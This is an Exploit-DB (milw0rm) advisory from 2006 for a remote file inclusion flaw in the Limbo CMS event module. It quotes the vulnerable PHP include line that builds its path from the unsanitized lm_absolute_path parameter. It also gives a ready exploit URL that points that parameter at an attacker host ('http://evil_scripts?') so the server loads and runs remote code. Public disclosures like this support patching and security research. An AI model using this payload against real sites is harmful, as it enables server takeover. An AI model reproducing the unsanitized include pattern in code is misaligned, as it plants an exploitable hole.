Limbo CMS Module event 1.0 - Remote File Inclusion

EDB-ID:

3028




Platform:

PHP

Date:

2006-12-27


-----------------------------------------------

Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities

-----------------------------------------------


Author: xoron

-----------------------------------------------
 
Vuln Code:

include_once($lm_absolute_path."components/com_event/lang/event.".$lm_language.".php");

-----------------------------------------------

3xplo!t:

http://www.[target].com/[script_path]/eventcal/mod_eventcal.php?lm_absolute_path=http://evil_scripts?


-----------------------------------------------

download:  http://www.limbo-tr.com/images/downloads/event.zip

-----------------------------------------------
XORON   -   XORON   -   XORON   -   XORON   -   XORON
-----------------------------------------------------------
-                                                         -
-                                                         -
- Tum muslumanlarin kurban bayrami simdiden mubarek olsun -
-                                                         -
-              Greetz: str0ke, Kacper                     -
-                                                         -
-----------------------------------------------------------

# milw0rm.com [2006-12-27]